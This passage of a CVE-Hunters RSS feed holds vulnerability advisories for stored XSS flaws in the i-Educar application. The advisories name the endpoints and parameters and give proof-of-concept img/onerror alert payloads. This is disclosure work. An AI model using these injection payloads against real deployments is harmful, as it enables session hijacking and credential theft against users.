class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9721/image.png&amp;#34;
	width=&amp;#34;575&amp;#34;
	height=&amp;#34;237&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9721/image_hu_a20ceff440c81918.png 480w, /p/cve-2025-9721/image_hu_dbd5009a60ec4280.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;242&amp;#34;
		data-flex-basis=&amp;#34;582px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9721/image-1.png&amp;#34;
	width=&amp;#34;567&amp;#34;
	height=&amp;#34;221&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9721/image-1_hu_36237c6d629f87b.png 480w, /p/cve-2025-9721/image-1_hu_10da103514a2b8fa.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;256&amp;#34;
		data-flex-basis=&amp;#34;615px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9721.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9721.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9722</title>
        <link>https://www.cvehunters.com/p/cve-2025-9722/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9722/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9722-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_tipo_ocorrencia_disciplinar_cadphp&amp;#34;&amp;gt;CVE-2025-9722: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9722&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9722&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9722-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_tipo_ocorrencia_disciplinar_cadphp&amp;#34;&amp;gt;CVE-2025-9722: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9722&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9722&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_tipo_ocorrencia_disciplinar_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9722/image.png&amp;#34;
	width=&amp;#34;584&amp;#34;
	height=&amp;#34;257&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9722/image_hu_c8cf46eb6b050b41.png 480w, /p/cve-2025-9722/image_hu_f1b1f0088f0fff87.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;227&amp;#34;
		data-flex-basis=&amp;#34;545px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9722/image-1.png&amp;#34;
	width=&amp;#34;551&amp;#34;
	height=&amp;#34;217&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9722/image-1_hu_8154a177a690938.png 480w, /p/cve-2025-9722/image-1_hu_7bd166c5469b1b4a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;253&amp;#34;
		data-flex-basis=&amp;#34;609px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9722.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9722.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9723</title>
        <link>https://www.cvehunters.com/p/cve-2025-9723/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9723/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9723-cross-site-scripting-xss-stored-endpoint-educar_tipo_regime_cadphp-parameter-nm_tipo&amp;#34;&amp;gt;CVE-2025-9723: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_tipo_regime_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9723&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9723&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_tipo_regime_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_tipo_regime_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9723-cross-site-scripting-xss-stored-endpoint-educar_tipo_regime_cadphp-parameter-nm_tipo&amp;#34;&amp;gt;CVE-2025-9723: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_tipo_regime_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9723&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9723&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_tipo_regime_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_tipo_regime_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9723/image.png&amp;#34;
	width=&amp;#34;579&amp;#34;
	height=&amp;#34;228&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9723/image_hu_30ee5bc94558a46c.png 480w, /p/cve-2025-9723/image_hu_d033cd6d8b8c0c81.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;253&amp;#34;
		data-flex-basis=&amp;#34;609px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9723.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9723.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9724</title>
        <link>https://www.cvehunters.com/p/cve-2025-9724/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9724/</guid>
